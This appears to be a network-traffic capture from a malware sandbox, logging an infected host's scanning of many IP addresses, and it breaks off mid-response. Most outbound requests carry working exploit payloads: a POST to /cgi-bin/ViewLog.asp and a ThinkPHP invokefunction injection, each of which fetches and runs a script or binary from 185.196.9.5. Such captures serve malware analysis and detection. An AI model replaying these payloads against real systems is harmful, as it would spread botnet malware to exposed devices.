Feb 25, 2024 19:02:48.646383047 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:02:49.734222889 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
135	192.168.2.15	55520	94.228.189.22	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:02:48.089709044 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
136	192.168.2.15	36074	31.44.130.148	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:02:48.132740021 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
137	192.168.2.15	55422	94.122.220.235	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:02:48.942082882 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
138	192.168.2.15	49624	94.121.187.195	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:02:48.942163944 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
139	192.168.2.15	32846	94.238.154.199	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:02:49.351267099 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:02:49.926265955 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:02:51.046407938 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
140	192.168.2.15	52908	94.130.58.2	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:02:49.352210045 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:02:49.540483952 CET	982	IN	HTTP/1.1 404 Content-Type: text/html;charset=utf-8 Content-Language: de Content-Length: 786 Date: Sun, 25 Feb 2024 18:02:49 GMT Keep-Alive: timeout=20 Connection: keep-alive Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 64 65 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 e2 80 93 20 6e 69 63 68 74 20 67 65 66 75 6e 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 62 6f 64 79 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 68 31 2c 20 68 32 2c 20 68 33 2c 20 62 20 7b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 7d 20 68 31 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 7d 20 68 32 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 7d 20 68 33 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 7d 20 70 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 7d 20 61 20 7b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 7d 20 2e 6c 69 6e 65 20 7b 68 65 69 67 68 74 3a 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 62 6f 72 64 65 72 3a 6e 6f 6e 65 3b 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 e2 80 93 20 6e 69 63 68 74 20 67 65 66 75 6e 64 65 6e 3c 2f 68 31 3e 3c 68 72 20 63 6c 61 73 73 3d 22 6c 69 6e 65 22 20 2f 3e 3c 70 3e 3c 62 3e 54 79 70 65 3c 2f 62 3e 20 53 74 61 74 75 73 20 52 65 70 6f 72 74 3c 2f 70 3e 3c 70 3e 3c 62 3e 4d 65 73 73 61 67 65 3c 2f 62 3e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 5b 26 23 34 37 3b 63 67 69 2d 62 69 6e 26 23 34 37 3b 56 69 65 77 4c 6f 67 2e 61 73 70 5d 20 69 73 20 6e 6f 74 20 61 76 61 69 6c 61 62 6c 65 3c 2f 70 3e 3c 70 3e 3c 62 3e 42 65 73 63 68 72 65 69 62 75 6e 67 3c 2f 62 3e 20 54 68 65 20 6f 72 69 67 69 6e 20 73 65 72 76 65 72 20 64 69 64 20 6e 6f 74 20 66 69 6e 64 20 61 20 63 75 72 72 65 6e 74 20 72 65 70 72 65 73 65 6e 74 61 74 69 6f 6e 20 66 6f 72 20 74 68 65 20 74 61 72 67 65 74 20 72 65 73 6f 75 72 63 65 20 6f 72 20 69 73 20 6e 6f 74 20 77 69 6c 6c 69 6e 67 20 74 6f 20 64 69 73 63 6c 6f 73 65 20 74 68 61 74 20 6f 6e 65 20 65 78 69 73 74 73 2e 3c 2f 70 3e 3c 68 72 20 63 6c 61 73 73 3d 22 6c 69 6e 65 22 20 2f 3e 3c 68 33 3e 41 70 61 63 68 65 20 54 6f 6d 63 61 74 2f 31 30 2e 31 2e 31 38 3c 2f 68 33 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!doctype html><html lang="de"><head><title>HTTP Status 404 nicht gefunden</title><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 404 nicht gefunden</h1><hr class="line" /><p><b>Type</b> Status Report</p><p><b>Message</b> The requested resource [/cgi-bin/ViewLog.asp] is not available</p><p><b>Beschreibung</b> The origin server did not find a current representation for the target resource or is not willing to disclose that one exists.</p><hr class="line" /><h3>Apache Tomcat/10.1.18</h3></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
141	192.168.2.15	51734	94.122.212.134	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:02:49.391213894 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
142	192.168.2.15	46720	31.0.213.31	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:02:49.395279884 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:02:49.634949923 CET	63	IN	HTTP/1.1 302 Moved Temporarily Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port
143	192.168.2.15	38660	112.29.212.224	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:02:49.724817038 CET	318	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:02:50.124910116 CET	486	IN	HTTP/1.1 400 Bad Request Server: Tengine Date: Sun, 25 Feb 2024 18:02:49 GMT Content-Type: text/html Content-Length: 249 Connection: close Via: ens-cache23.cn6653[,0] Timing-Allow-Origin: * EagleId: 0000000017088841699431712e Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0d 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 68 72 2f 3e 50 6f 77 65 72 65 64 20 62 79 20 54 65 6e 67 69 6e 65 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>400 Bad Request</h1><p>Your browser sent a request that this server could not understand.<hr/>Powered by Tengine</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
144	192.168.2.15	52932	88.138.114.161	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:02:49.908746004 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:02:50.091582060 CET	437	IN	HTTP/1.1 400 Bad Request Date: Sun, 25 Feb 2024 18:02:49 GMT Server: Apache/2.4.38 (Raspbian) OpenSSL/1.1.1n Content-Length: 226 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
145	192.168.2.15	55992	88.198.101.19	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:02:49.909871101 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:02:50.093759060 CET	307	IN	HTTP/1.1 400 Bad Request Server: nginx Date: Sun, 25 Feb 2024 18:02:56 GMT Content-Type: text/html Content-Length: 150 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
146	192.168.2.15	52596	88.119.169.103	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:02:50.085135937 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:02:50.259941101 CET	510	IN	HTTP/1.1 400 Bad Request Date: Sun, 25 Feb 2024 18:02:50 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 316 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 32 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 32 34 31 30 38 2d 34 30 33 39 38 2e 62 61 63 6c 6f 75 64 2e 69 6e 66 6f 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><hr><address>Apache/2.4.52 (Ubuntu) Server at 24108-40398.bacloud.info Port 80</address></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
147	192.168.2.15	36248	88.18.29.215	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:02:50.280122995 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:02:50.475054026 CET	499	IN	HTTP/1.1 400 Bad Request Date: Sun, 25 Feb 2024 18:02:50 GMT Server: Apache/2.4.54 (Raspbian) Content-Length: 303 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 34 20 28 52 61 73 70 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 31 32 37 2e 30 2e 31 2e 31 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><hr><address>Apache/2.4.54 (Raspbian) Server at 127.0.1.1 Port 80</address></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
148	192.168.2.15	42514	88.221.28.225	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:02:50.284027100 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:02:50.483237028 CET	479	IN	HTTP/1.0 400 Bad Request Server: AkamaiGHost Mime-Version: 1.0 Content-Type: text/html Content-Length: 257 Expires: Sun, 25 Feb 2024 18:02:50 GMT Date: Sun, 25 Feb 2024 18:02:50 GMT Connection: close Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 34 35 35 65 38 63 34 66 26 23 34 36 3b 31 37 30 38 38 38 34 31 37 30 26 23 34 36 3b 63 66 30 30 64 39 35 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http://%5bNo%20Host%5d/index.php?", is invalid.<p>Reference #9.455e8c4f.1708884170.cf00d95</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
149	192.168.2.15	33250	88.221.171.28	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:02:50.289330006 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:02:50.493261099 CET	479	IN	HTTP/1.0 400 Bad Request Server: AkamaiGHost Mime-Version: 1.0 Content-Type: text/html Content-Length: 257 Expires: Sun, 25 Feb 2024 18:02:50 GMT Date: Sun, 25 Feb 2024 18:02:50 GMT Connection: close Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 